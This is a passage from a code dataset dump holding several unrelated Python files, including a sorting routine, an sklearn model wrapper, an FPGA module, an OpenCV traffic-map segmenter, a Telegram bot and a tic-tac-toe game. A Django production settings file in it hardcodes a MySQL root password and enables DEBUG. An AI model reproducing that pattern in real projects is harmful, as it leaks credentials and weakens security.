ss.append(smallest)\n return ss\n\n#######################################################\ndef selection_sort_key(xs, key=(lambda x:x)): # key에 이 람다(향등함수)는 자기가 받은 인수를 그대로 돌려준다.\n ss = [] # xs, ss = xs, []\n while xs != []:\n smallest = min(xs,key=key)\n rm.remove_proc(xs,smallest) #xs.remove(smallest)\n ss.append(smallest)\n # xs, ss = xs, ss\n return ss\n","sub_path":"selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"210153384","text":"import pickle\n\nimport pandas as pd\n\n\nclass IdentityTransform:\n \"\"\"Simple placeholder if no transformer is passed in.\"\"\"\n\n @staticmethod\n def transform(input_df):\n return input_df\n\n\nclass SimpleSklearnModel:\n \"\"\"Simple class to deserialize and run a sklearn model on json input.\"\"\"\n\n def __init__(\n self,\n path_to_serialized_model,\n output_columns,\n path_to_serialized_transformer=None,\n is_classifier=False,\n is_multiclass=False,\n ):\n self.path_to_serialized_model = path_to_serialized_model\n self.path_to_serialized_transformer = path_to_serialized_transformer\n self.output_columns = output_columns\n self.is_cls = is_classifier\n self.is_multi = is_multiclass\n with open(self.path_to_serialized_model, 'rb') as infile:\n self.model = pickle.load(infile)\n if self.path_to_serialized_transformer is not None:\n with open(self.path_to_serialized_transformer, 'rb') as infile:\n self.transformer = pickle.load(infile)\n else:\n self.transformer = IdentityTransform()\n\n def predict(self, input_df):\n if self.is_cls:\n if self.is_multi:\n predict_fn = self.model.predict_proba\n else:\n\n def predict_fn(x):\n return self.model.predict_proba(x)[:, 1]\n\n else:\n predict_fn = self.model.predict\n\n return pd.DataFrame(\n predict_fn(self.transformer.transform(input_df)),\n columns=self.output_columns,\n )\n\nprint('test')\n","sub_path":"wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"451984682","text":"from migen.fhdl.std import *\nfrom migen.flow.actor import Source, Sink\nfrom migen.fhdl.size import bits_for\nfrom migen.genlib.fsm import FSM, NextState\n\nfrom whacker.util import dmatpl\n\nfrom ulpi import ULPI_DATA\nD_LAST = [(\"d\", 8), (\"last\", 1)]\n\nfrom constants import *\n\n\ndef _inc(signal, modulo, dest_signal=None):\n if type(dest_signal) == type(None):\n 
dest_signal = signal\n\n assert modulo == 2**flen(signal)\n assert flen(dest_signal) == flen(signal)\n return dest_signal.eq(signal + 1)\n\nclass Consumer(Module):\n def __init__(self, port, depth):\n self.sink = Sink(dmatpl(depth))\n self.source = Source(D_LAST)\n self.busy = Signal()\n\n self.pos = Signal(max=depth, reset=0)\n self.pos_next = Signal(max=depth, reset=0)\n self.ct = Signal(max=depth, reset=0)\n self.ct_next = Signal(max=depth)\n\n\n self.comb += [\n self.ct_next.eq(self.ct),\n\n self.pos_next.eq(self.pos),\n port.adr.eq(self.pos_next),\n ]\n\n self.sync += [\n self.pos.eq(self.pos_next),\n self.ct.eq(self.ct_next)\n ]\n\n self.submodules.fsm = FSM()\n\n self.fsm.act(\"IDLE\",\n self.busy.eq(0),\n If(self.sink.stb,\n self.busy.eq(1),\n self.sink.ack.eq(1),\n self.pos_next.eq(self.sink.payload.start),\n self.ct_next.eq(self.sink.payload.count-1),\n NextState('d'),\n )\n )\n \n self.fsm.act(\"d\",\n self.busy.eq(1),\n self.source.stb.eq(1),\n self.source.payload.d.eq(port.dat_r),\n\n If(self.ct == 0,\n self.source.payload.last.eq(1)),\n\n If(self.source.ack,\n If(self.ct,\n _inc(self.pos, depth, self.pos_next),\n self.ct_next.eq(self.ct - 1),\n ).Else(\n NextState(\"IDLE\")\n )\n )\n )\n\n\n\nclass TestConsumer(Module):\n def __init__(self):\n from migen.actorlib.sim import SimActor, Dumper, Token\n\n class PORT(Module):\n def __init__(self, aw, dw):\n self.adr = Signal(aw)\n self.dat_r = Signal(dw)\n\n self.sync += self.dat_r.eq(self.adr)\n\n self.submodules.port = PORT(bits_for(1024), 8)\n\n def gen():\n yield Token('source', {\"start\": 0, \"count\" : 4})\n yield None\n yield Token('source', {\"start\": 555, \"count\" : 77})\n \n\n class SimSource(SimActor):\n def __init__(self):\n self.source = Source(dmatpl(1024))\n SimActor.__init__(self, gen())\n\n self.submodules.src = SimSource()\n self.submodules.c = Consumer(self.port, 1024)\n self.comb += self.c.sink.connect(self.src.source)\n self.comb += self.src.busy.eq(0)\n\n self.submodules.dmp = Dumper(D_LAST)\n self.comb += self.c.source.connect(self.dmp.result)\n self.comb += self.dmp.busy.eq(0)\n\n\n\nif __name__ == '__main__':\n from migen.sim.generic import Simulator, TopLevel\n tl = TopLevel(\"testcons.vcd\")\n test = TestConsumer()\n sim = Simulator(test, tl)\n sim.run(200)\n \n\n","sub_path":"software/fpga/ov3/whacker/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"565249130","text":"import cv2\nimport numpy as np\nimport glob\nimport os\n\ndef maintain_aspect_ratio_resize(image, width=None, height=None, inter=cv2.INTER_AREA):\n dim = None\n (h, w) = image.shape[:2]\n if width is None and height is None:\n return image\n if width is None:\n r = height / float(h)\n dim = int(w * r), height\n else:\n r = width / float(w)\n dim = (width, int(h * r))\n return cv2.resize(image, dim, interpolation=inter)\ndef remove_object(immageToProcessPath):\n for filepath in glob.iglob(r'C:\\Users\\User\\PycharmProjects\\map_image_automation\\Icons\\*.png'):\n\n template = cv2.imread(filepath)\n template = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)\n template = cv2.Canny(template, 50, 200)\n (tH, tW) = template.shape[:2]\n # cv2.imshow(\"template\", template)\n\n original_image = cv2.imread(immageToProcessPath)\n final = original_image.copy()\n gray = cv2.cvtColor(original_image, cv2.COLOR_BGR2GRAY)\n found = None\n\n for scale in np.linspace(0.2, 1.0, 20)[::-1]:\n resized = 
maintain_aspect_ratio_resize(gray, width=int(gray.shape[1] * scale))\n r = gray.shape[1] / float(resized.shape[1])\n\n if resized.shape[0] < tH or resized.shape[1] < tW:\n break\n canny = cv2.Canny(resized, 50, 200)\n detected = cv2.matchTemplate(canny, template, cv2.TM_CCOEFF)\n (_, max_val, _, max_loc) = cv2.minMaxLoc(detected)\n\n if found is None or max_val > found[0]:\n found = (max_val, max_loc, r)\n\n (_, max_loc, r) = found\n (start_x, start_y) = (int(max_loc[0] * r), int(max_loc[1] * r))\n (end_x, end_y) = (int((max_loc[0] + tW) * r), int((max_loc[1] + tH) * r))\n\n cv2.rectangle(original_image, (start_x, start_y), (end_x, end_y), (0, 255, 0), 2)\n # cv2.imshow('detected', original_image)\n\n cv2.rectangle(final, (start_x, start_y), (end_x, end_y), (255, 255, 255), -1)\n #cv2.imshow('result', final)\n # cv2.waitKey(0)\n\n cv2.imwrite(immageToProcessPath, final)\ndef segment_image(imagePath):\n # img = \"mohakhali2.PNG\"\n print(imagePath)\n img = imagePath\n image = cv2.imread(str(img))\n\n mask = cv2.threshold(image, 210, 255, cv2.THRESH_BINARY)[1][:, :, 0]\n dst = cv2.inpaint(image, mask, 7, cv2.INPAINT_NS)\n\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n #cv2.imshow('masked', mask)\n #cv2.waitKey(0)\n ############ For Yellow Color ############\n\n lower_yellow = np.array([10, 160, 240])\n upper_yellow = np.array([80, 250, 255])\n\n mask = cv2.inRange(hsv, lower_yellow, upper_yellow)\n res_yellow = cv2.bitwise_and(image, image, mask=mask)\n #cv2.imwrite('yellow.png', res_yellow)\n\n ######### For Green Color##############\n # [ 51 127 174] [ 71 147 254]\n lower_blue = np.array([51, 127, 174])\n # upper_blue = np.array([145, 255, 255])\n upper_blue = np.array([71, 147, 254])\n mask = cv2.inRange(hsv, lower_blue, upper_blue)\n res_blue = cv2.bitwise_and(image, image, mask=mask)\n #cv2.imwrite('green.png', res_blue)\n\n ######### For Red Color ###########\n # [ 2 168 255] [ 22 188 255]\n # dark red [ 0 184 89] [ 0 204 169]\n # less dark red [ 0 192 255] [ 0 212 255]\n # lower_red = np.array([0, 184, 255])\n # upper_red = np.array([0, 204, 169])\n #\n # mask = cv2.inRange(hsv, lower_red, upper_red)\n\n # Range for lower red\n lower_red = np.array([0, 120, 70])\n upper_red = np.array([10, 255, 255])\n mask1 = cv2.inRange(hsv, lower_red, upper_red)\n\n # Range for upper range\n lower_red = np.array([170, 120, 70])\n upper_red = np.array([180, 255, 255])\n mask2 = cv2.inRange(hsv, lower_red, upper_red)\n\n # Generating the final mask to detect red color\n mask = mask1 + mask2\n\n res_red = cv2.bitwise_and(image, image, mask=mask)\n #cv2.imwrite('red.png', res_red)\n # cv2.imshow('red',cv2.imread('messi_red.png'))\n # cv2.waitKey(0)\n cv2.destroyAllWindows()\n height, width, channels = image.shape\n\n res = res_red + res_blue + res_yellow\n for i in range(0, height):\n for j in range(0, width):\n a, b, c = res_red[i, j]\n if (a > 0 or b > 0 or c > 0):\n a, b, c = res_blue[i, j]\n if (a > 0 or b > 0 or c > 0):\n a, b, c = res_blue[i, j]\n if (a > 0 or b > 0 or c > 0):\n res[i, j] = 0, 0, 0\n\n # res[:, 850:] = [0, 0, 0]\n # res[:, 0:640] = [0, 0, 0]\n # res[350:, :700] = [0, 0, 0]\n\n kernel = np.ones((20, 1), np.uint8) # note this is a horizontal kernel\n d_im = cv2.dilate(res, kernel, iterations=1)\n e_im = cv2.erode(d_im, kernel, iterations=1)\n\n imageName = imagePath.split('\\\\')[-1]\n area_name = imageName.split('_')[0]\n savepath = f'G:\\SPL3 Repo\\SoftwareProjectLab3_GG\\ImageToDataPreprocessing\\Test Dataset\\{area_name}\\Cleaned'\n cv2.imwrite(os.path.join(savepath, 
imageName), res)\ndef calcPercentage(msk):\n\t'''\n\treturns the percentage of white in a binary image\n\t'''\n\theight, width = msk.shape[:2]\n\tnum_pixels = height * width\n\tcount_white = cv2.countNonZero(msk)\n\tpercent_white = (count_white/num_pixels) * 100\n\tpercent_white = round(percent_white,2)\n\treturn percent_white\n\ndef image_to_text(imagePath):\n img = cv2.imread(imagePath)\n size = img.size\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n lower_blue = np.array([51, 127, 174])\n upper_blue = np.array([71, 147, 254])\n mask = cv2.inRange(hsv, lower_blue, upper_blue)\n # cv2.imshow('test',mask)\n # cv2.waitKey()\n # print('green:' + str(calcPercentage(mask)))\n green_val = str(calcPercentage(mask))\n\n lower_yellow = np.array([10, 160, 240])\n upper_yellow = np.array([80, 250, 255])\n\n mask = cv2.inRange(hsv, lower_yellow, upper_yellow)\n #print('yellow/orange:' + str(calcPercentage(mask)))\n yellow_val = str(calcPercentage(mask))\n lower_red = np.array([0, 120, 70])\n upper_red = np.array([10, 255, 255])\n mask1 = cv2.inRange(hsv, lower_red, upper_red)\n\n # Range for upper range\n lower_red = np.array([170, 120, 70])\n upper_red = np.array([180, 255, 255])\n mask2 = cv2.inRange(hsv, lower_red, upper_red)\n\n # Generating the final mask to detect red color\n mask = mask1 + mask2\n # print('red:' + str(calcPercentage(mask)))\n red_val = str(calcPercentage(mask))\n image_name = imagePath.split('\\\\')[-1]\n area_name = image_name.split('_')[0]\n date = image_name.split('_')[1]\n day = image_name.split('_')[2]\n time = image_name.split('_')[3]+ ':' +image_name.split('_')[4]+ ':' +image_name.split('_')[5].split('.')[0]\n total_string = area_name + ',' + date + ',' + day + ','+ time + ','+ green_val+','+ yellow_val +',' + red_val\n savepath = f'G:\\SPL3 Repo\\SoftwareProjectLab3_GG\\ImageToDataPreprocessing\\Test Dataset'\n f = open(os.path.join(savepath, area_name+'.txt'), \"a+\")\n # f.write(total_string)\n # f.write('\\n')\n # print(total_string)\n\ndef main():\n #areas = ['Uttara','Farmgate','Dhanmondi','Karwan Bazar','Sadarghat','Kalabagan','Mirpur 1','Mirpur 10','Shahbagh', 'Kamalapur', 'Tejgaon','Mohammadpur','Katabon']\n areas = ['Tejgaon', 'Mohammadpur', 'Katabon']\n #areas = ['Mohakhali2']\n for areaName in areas:\n fileNo = 1\n folderPath = f'G:\\SPL3 Repo\\SoftwareProjectLab3_GG\\ImageToDataPreprocessing\\Test Dataset\\{areaName}\\*.png'\n for filepath in glob.iglob(folderPath):\n # print(filepath)\n print(f'working on image {fileNo}')\n remove_object(filepath)\n segment_image(filepath)\n cleaned_path = f'G:\\SPL3 Repo\\SoftwareProjectLab3_GG\\ImageToDataPreprocessing\\Test Dataset\\{areaName}\\Cleaned\\*.png'\n\n # for filepath in glob.iglob(cleaned_path):\n # image_to_text(filepath)\n # print(f'working on image {fileNo}')\nif __name__ == \"__main__\":\n main()","sub_path":"ImageToDataPreprocessing/Codes/ImageProcess.py","file_name":"ImageProcess.py","file_ext":"py","file_size_in_byte":7943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"407591270","text":"DEBUG = True\n\nDATABASES = {\n \"default\": {\n # Ends with \"postgresql_psycopg2\", \"mysql\", \"sqlite3\" or \"oracle\".\n \"ENGINE\": \"django.db.backends.mysql\",\n # DB name or path to database file if using sqlite3.\n \"NAME\": \"pingjia\",\n # Not used with sqlite3.\n \"USER\": \"root\",\n # Not used with sqlite3.\n \"PASSWORD\": \"hY67UJMN\",\n # Set to empty string for localhost. 
Not used with sqlite3.\n \"HOST\": \"\",\n # Set to empty string for default. Not used with sqlite3.\n \"PORT\": \"\",\n }\n}\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n# django-celery settings\nimport djcelery\ndjcelery.setup_loader()\n\nBROKER_HOST = \"localhost\"\nBROKER_PORT = 5672\nBROKER_BACKEND = \"django\"\n#BROKER_URL='django://'\nBROKER_USER = \"guest\"\nBROKER_PASSWORD = \"guest\"\nBROKER_VHOST = \"/\"\nCELERYBEAT_SCHEDULER = 'djcelery.schedulers.DatabaseScheduler'\n","sub_path":"pingjia/local_settings_prod.py","file_name":"local_settings_prod.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"38500958","text":"'''\r\nCreated on 8 Jun 2015\r\n\r\n@author: philip knaute\r\n------------------------------------------------------------------------------\r\nCopyright (C) 2015, Philip Knaute <philiphorst.project@gmail.com>,\r\n\r\nThis work is licensed under the Creative Commons\r\nAttribution-NonCommercial-ShareAlike 4.0 International License. To view a copy of\r\nthis license, visit http://creativecommons.org/licenses/by-nc-sa/4.0/ or send\r\na letter to Creative Commons, 444 Castro Street, Suite 900, Mountain View,\r\nCalifornia, 94041, USA.\r\n------------------------------------------------------------------------------\r\n'''\r\nimport csv\r\nimport scipy.io as sio\r\n\r\ndef read_calc_times(mat_file_path):\r\n \"\"\" Read the average calculation times for each operation from a HCTSA_loc.mat file\r\n Parameters:\r\n -----------\r\n mat_file_path : string\r\n Path to the HCTSA_loc.mat file\r\n Returns:\r\n --------\r\n op_ids_times_lst : list\r\n List of two lists. First being the operation ids and second the average times over all \r\n calculated timeseries for each respective operation.\r\n \"\"\" \r\n mat_file = sio.loadmat(mat_file_path)\r\n op_id = lambda i : int(mat_file['Operations'][i][0][3][0])\r\n \r\n calc_times = mat_file['TS_CalcTime'].sum(axis=0)/mat_file['TS_CalcTime'].shape[0]\r\n op_ids = [op_id(i) for i in range(mat_file['Operations'].shape[0])]\r\n return [op_ids,calc_times.tolist()]\r\n\r\ndef read_from_mat_file(inputDir,task_name,hctsa_struct_names,is_from_old_matlab = False):\r\n \"\"\"\r\n read .mat files into appropriate python data structures\r\n \r\n Parameters:\r\n ----------\r\n inputDir : string\r\n path to the directory where the mat/csv files are kept\r\n task_name : string\r\n the name of the classification task to be imported\r\n hctsa_struct_names : list\r\n List of strings of identifiers for which structures are to be read from the mat_file. \r\n Possible values are : 'TimeSeries','Operations','TS_DataMat'\r\n is_from_old_matlab : bool\r\n If the HCTSA_loc.mat files are saved from an older version of the comp engine. 
The order of entries is different.\r\n Returns:\r\n --------\r\n retval : tuple\r\n Tuple of the imported values in the order given by hctsa_struct_names\r\n \"\"\"\r\n\r\n LTv7_3 = False # lesser than mat v7.3\r\n # Input for true case not implemented yet\r\n \r\n\r\n # try:\r\n # mat_file = sio.loadmat(mat_file_path)\r\n # except NotImplementedError:\r\n # LTv7_3 = False\r\n # mat_file = h5py.File(mat_file_path,'r')\r\n # except:\r\n # ValueError('Could not read the file!')\r\n \r\n retval = tuple()\r\n for item in hctsa_struct_names:\r\n if item == 'TimeSeries':\r\n path_pattern = inputDir+'{:s}/hctsa_timeseries-info.csv'\r\n ts_info_path = path_pattern.format(task_name)\r\n timeseries = dict()\r\n if is_from_old_matlab:\r\n # lambda function used to populate the dictionary with the appropriate data lists\r\n ts_id = lambda i : int(ts_info['TimeSeries'][i][0][0][0]) #id\r\n ts_filename = lambda i : str(ts_info['TimeSeries'][i][0][1][0]) #name\r\n ts_kw = lambda i : str(ts_info['TimeSeries'][i][0][2][0]) #keyword\r\n ts_n_samples = lambda i : int(ts_info['TimeSeries'][i][0][3][0]) #length\r\n # data is not included in the returned dictionary as it seem a waste of space\r\n #ts_data = lambda i : mat_file['TimeSeries'][i][0][4]\r\n for extractor,key in zip([ts_id,ts_filename ,ts_kw,ts_n_samples],['id','filename','keywords','n_samples']):\r\n timeseries[key] =[extractor(i) for i in range(mat_file['TimeSeries'].shape[0])]\r\n elif not is_from_old_matlab and LTv7_3:\r\n # -- currently there seems to be a bug in the creation of those files. Need to\r\n # read them differently\r\n # lambda function used to populate the dictionary with the appropriate data lists\r\n #ts_id = lambda i : int(mat_file['TimeSeries'][i][0][0][0])\r\n\r\n # ----------- this is the original version, I (Carl) somehow need to switch the first two dimensions ----\r\n # ts_filename = lambda i : str(mat_file['TimeSeries'][0][i][0][0])\r\n # ts_kw = lambda i : str(mat_file['TimeSeries'][0][i][1][0])\r\n # ts_n_samples = lambda i : int(mat_file['TimeSeries'][0][i][2][0])\r\n # # -- data is not included in the returned dictionary as it seem a waste of space\r\n # #ts_data = lambda i : mat_file['TimeSeries'][i][0][3]\r\n # for extractor,key in zip([ts_filename ,ts_kw,ts_n_samples],['filename','keywords','n_samples']):\r\n # timeseries[key] =[extractor(i) for i in range(mat_file['TimeSeries'].shape[1])]\r\n\r\n # ------------ to this\r\n ts_filename = lambda i: str(mat_file['TimeSeries'][i][0][0][0])\r\n ts_kw = lambda i: str(mat_file['TimeSeries'][i][0][1][0])\r\n #ts_n_samples = lambda i: int(mat_file['TimeSeries'][i][0][2][0])\r\n # -- data is not included in the returned dictionary as it seem a waste of space\r\n # ts_data = lambda i : mat_file['TimeSeries'][i][0][3]\r\n for extractor, key in zip([ts_filename, ts_kw, ts_n_samples], ['filename', 'keywords', 'n_samples']):\r\n timeseries[key] = [extractor(i) for i in range(mat_file['TimeSeries'].shape[0])]\r\n else:\r\n import re\r\n with open(ts_info_path,'r') as f1:\r\n info_reader = csv.reader(f1)\r\n ts_info = list(info_reader)\r\n del ts_info[0]\r\n ts_filename = lambda i: str(ts_info[i][0])\r\n ts_kw = lambda i: re.sub(\"SHAM_|DREDD_|rsfMRI_|mouse\\d+\",'',str(ts_info[i][1].replace(',','_') ) )\r\n ts_n_samples = lambda i: int(ts_info[i][2])\r\n\r\n for extractor, key in zip([ts_filename, ts_kw, ts_n_samples], ['filename', 'keywords', 'n_samples']):\r\n timeseries[key] = [extractor(i) for i in range(len(ts_info))]\r\n retval = retval + (timeseries,)\r\n \r\n if item == 
'Operations':\r\n path_pattern = inputDir+'{:s}/hctsa_features.csv'\r\n op_path = path_pattern.format(task_name)\r\n operations = dict()\r\n if is_from_old_matlab:\r\n op_id = lambda i : int(mat_file['Operations'][i][0][0][0])\r\n op_name = lambda i : str(mat_file['Operations'][i][0][1][0])\r\n op_kw = lambda i : str(mat_file['Operations'][i][0][2][0])\r\n op_code = lambda i : str(mat_file['Operations'][i][0][3][0])\r\n op_mopid = lambda i : int(mat_file['Operations'][i][0][4][0])\r\n for extractor,key in zip([op_id,op_name ,op_kw,op_code,op_mopid],['id','name','keywords','code_string','master_id']):\r\n operations[key] =[extractor(i) for i in range(mat_file['Operations'].shape[0])] \r\n elif not is_from_old_matlab and LTv7_3:\r\n # lambda function used to populate the dictionary with the appropriate data lists\r\n op_id = lambda i : int(mat_file['Operations'][i][0][3][0])\r\n op_name = lambda i : str(mat_file['Operations'][i][0][1][0])\r\n op_kw = lambda i : str(mat_file['Operations'][i][0][2][0])\r\n op_code = lambda i : str(mat_file['Operations'][i][0][0][0])\r\n op_mopid = lambda i : int(mat_file['Operations'][i][0][4][0])\r\n for extractor,key in zip([op_id,op_name ,op_kw,op_code,op_mopid],['id','name','keywords','code_string','master_id']):\r\n operations[key] =[extractor(i) for i in range(mat_file['Operations'].shape[0])]\r\n else:\r\n with open(op_path,'r') as f:\r\n reader = csv.reader(f)\r\n op = []\r\n for row in reader:\r\n op.append(row)\r\n del op[0]\r\n op_id = lambda i : int(op[i][3])\r\n op_name = lambda i : str(op[i][1])\r\n op_code = lambda i : str(op[i][0])\r\n op_mopid = lambda i : int(op[i][4])\r\n op_kw = lambda i : str(op[i][2])\r\n for extractor,key in zip([op_id,op_name,op_kw,op_code,op_mopid],['id','name','keywords','code_string','master_id']):\r\n operations[key] =[extractor(i) for i in range(len(op))]\r\n retval = retval + (operations,)\r\n\r\n if item == 'TS_DataMat':\r\n if LTv7_3:\r\n raise ValueError(\"Not Implemented yet\")\r\n else:\r\n path_pattern = inputDir + '{:s}/hctsa_datamatrix.csv'\r\n mat_file_path = path_pattern.format(task_name)\r\n with open(mat_file_path,'r') as f:\r\n reader = csv.reader(f)\r\n mat_file = []\r\n for row in reader:\r\n mat_file.append([float(elem) for elem in row])\r\n retval = retval + (mat_file,)\r\n\r\n if item == 'MasterOperations':\r\n path_pattern = inputDir+'{:s}/hctsa_masterfeatures.csv'\r\n m_op_path = path_pattern.format(task_name)\r\n m_operations = dict()\r\n if is_from_old_matlab:\r\n raise NameError('Don''t know how to get MasterOperations from old Matlab version.')\r\n elif not is_from_old_matlab and LTv7_3:\r\n # lambda function used to populate the dictionary with the appropriate data lists\r\n m_op_id = lambda i: int(mat_file['MasterOperations'][i][0][2][0][0])\r\n m_op_name = lambda i: str(mat_file['MasterOperations'][i][0][1][0])\r\n for extractor, key in zip([m_op_id, m_op_name],\r\n ['id', 'name']):\r\n m_operations[key] = [extractor(i) for i in range(mat_file['MasterOperations'].shape[0])]\r\n else:\r\n with open(m_op_path,'r') as f:\r\n reader = csv.reader(f)\r\n m_op = []\r\n for row in reader:\r\n m_op.append(row)\r\n del m_op[0]\r\n m_op_id = lambda i: int(m_op[i][2])\r\n m_op_name = lambda i: str(m_op[i][1])\r\n for extractor, key in zip([m_op_id, m_op_name],\r\n ['id', 'name']):\r\n m_operations[key] = [extractor(i) for i in range(len(m_op))]\r\n retval = retval + (m_operations,)\r\n\r\n return 
retval\r\n","sub_path":"op_importance/workflow_classes/modules/misc/PK_matlab_IO.py","file_name":"PK_matlab_IO.py","file_ext":"py","file_size_in_byte":10762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"325620664","text":"f = open(\"day1test2.txt\", 'r')\ni = 1\np = 0\nfor c in f.read():\n\tif c == '(':\n\t\ti = i+1\n\telse:\n\t\ti = i-1\n\tp = p+1\n\tif i<=0:\n\t\tbreak\n\nf.close()\nprint(p)\n","sub_path":"day1_p2.py","file_name":"day1_p2.py","file_ext":"py","file_size_in_byte":150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"473494219","text":"from telegram import InlineKeyboardButton, InlineKeyboardMarkup, ReplyKeyboardMarkup\r\nimport telegram\r\nfrom maxsulot import *\r\nimport json\r\nimport ast\r\n\r\n# Kraska\r\ndef Kraskalar(query):\r\n buttons=[]\r\n count=0\r\n for i in Kraska:\r\n a={'fun':'Rangi', 'index':count}\r\n a=json.dumps(a)\r\n button=[InlineKeyboardButton(i['Nomi'], callback_data=a)]\r\n buttons.append(button)\r\n count+=1\r\n buttons=InlineKeyboardMarkup(buttons)\r\n query.message.reply_html('📌 \\nBizning maxsulotlardan istaganingizni tanlang va buyurtma bering. \\n <b>Barch maxsulotlar:</b>', reply_markup=buttons)\r\n# Rangi\r\ndef Ranglar(a, query):\r\n buttons=[]\r\n count=0\r\n print(Kraska[int(a)]['img'])\r\n for i in Kraska[a]['Rangi']:\r\n fun={'fun':'Kg', 'index':a, 'rang':i}\r\n print(i)\r\n fun=json.dumps(fun)\r\n button=[InlineKeyboardButton(Rang[i], callback_data=fun)]\r\n buttons.append(button)\r\n count+=1\r\n buttons=InlineKeyboardMarkup(buttons)\r\n query.message.reply_photo(photo=open(Kraska[int(a)]['img'], 'rb'), caption='📌 \\nIltimos tanlagan maxsulotingiz rangini kiriting. \\n <b>Maxsulotning bizda mavjut ranglari:</b>', parse_mode='HTML', reply_markup=buttons)\r\n\r\n# Kg\r\ndef Kglar(a, query):\r\n buttons=[]\r\n count=0\r\n for i in Kraska[a]['Kg']:\r\n fun={'fun':'Narxi', 'index':a, 'kg':i}\r\n fun=json.dumps(fun)\r\n button=[InlineKeyboardButton(str(Kg[i])+' Kg', callback_data=fun)]\r\n buttons.append(button)\r\n count+=1\r\n buttons=InlineKeyboardMarkup(buttons)\r\n query.message.reply_html('📌 \\nBizda siz tanlagan maxsulotning sifativa kilogramiga qarab quyidagi narxlari mavjut. \\n <b>Maxsulotning bizda mavjut ranglari:</b>', reply_markup=buttons)\r\n\r\n# Narxi\r\ndef Narxlar(a, query):\r\n buttons=[]\r\n count=0\r\n for i in Kraska[a]['Narxi']:\r\n fun={'fun':'Soni', 'index':a, 'narx':i}\r\n fun=json.dumps(fun)\r\n button=[InlineKeyboardButton(str(Narx[i])+\" so'm/dona\", callback_data=fun)]\r\n buttons.append(button)\r\n count+=1\r\n buttons=InlineKeyboardMarkup(buttons)\r\n query.message.reply_html('📌 \\nBizda siz tanlagan maxsulotning sifativa kilogramiga qarab quyidagi narxlari mavjut. \\n <b>Maxsulotning bizda mavjut ranglari:</b>', reply_markup=buttons)\r\n\r\n\r\n\r\ndef Sonlar(a, query):\r\n buttons=[]\r\n count=0\r\n for i in Kraska[a]['Soni']:\r\n fun={'fun':'Count', 'soni':Soni[count]}\r\n fun=json.dumps(fun)\r\n button=[InlineKeyboardButton(Soni[i], callback_data=fun)]\r\n buttons.append(button)\r\n count+=1\r\n buttons=InlineKeyboardMarkup(buttons)\r\n query.message.reply_html('📌 \\nBizda siz tanlagan maxsulotning sifativa kilogramiga qarab quyidagi narxlari mavjut. 
\\n <b>Maxsulotning bizda mavjut ranglari:</b>', reply_markup=buttons)\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"277052613","text":"from tkinter import *\nfrom tkinter import ttk\nimport os\nfrom copy import deepcopy\nimport time\nimport random\n\nclass Field:\n def __init__(self, root_window, pos_x, pos_y, blank, circle, cross, parent):\n self.root = root_window\n self.x = pos_x\n self.y = pos_y\n \n self.parent = parent\n self.owner = None\n\n #to do obrazków muszą to być PhotoImage\n self.blank = blank\n self.circle = circle\n self.cross = cross\n\n self.label = Label(self.root, borderwidth = 2, background = 'black')\n self.label['image'] = blank\n self.label.grid(column = self.x, row = self.y)\n self.label.bind('<Button-1>', self.clicked)\n\n def unbind(self):\n self.label.unbind('<Button-1>')\n\n def clicked(self, event):\n if self.parent.player == 'player':\n self.unbind()\n self.label['image'] = self.cross\n self.root.update_idletasks()\n self.owner = 'player'\n self.parent.player_click(tuple(self))\n \n def __iter__(self):\n yield self.x\n yield self.y\n\n def computer_click(self):\n if self.parent.player == 'computer':\n self.unbind()\n self.owner = 'computer'\n self.label['image'] = self.circle\n\nclass Game:\n base_folder = os.path.dirname(__file__)\n def __init__(self):\n self.player = 'player'\n self.root = Tk()\n\n self.blank = PhotoImage(file=os.path.join(Game.base_folder, 'blank.gif'))\n self.circle = PhotoImage(file=os.path.join(Game.base_folder, 'circle.gif'))\n self.cross = PhotoImage(file=os.path.join(Game.base_folder, 'cross.gif'))\n\n self.root.geometry(\"200x100\")\n self.root.title('Tic Tac Toe')\n\n self.info_label = Label(self.root, text='Tic Tac Toe')\n self.info_label.pack(side=TOP, pady = 10)\n self.start_button = ttk.Button(self.root, text='START')\n self.start_button.pack(side=BOTTOM, pady = 10)\n\n self.start_button.bind('<Button-1>', self.make_board)\n \n self.root.mainloop()\n\n def make_board(self, event):\n self.root.withdraw()\n self.game_frame = Toplevel()\n self.game_frame.protocol(\"WM_DELETE_WINDOW\", self.close_game_frame)\n self.game_frame.title('Tic Tac Toe')\n self.start_game()\n\n def start_game(self):\n self.tiles = dict()\n for y in range(3):\n for x in range(3):\n self.tiles[(x, y)] = Field(self.game_frame, x, y, self.blank, self.circle, self.cross, self)\n \n 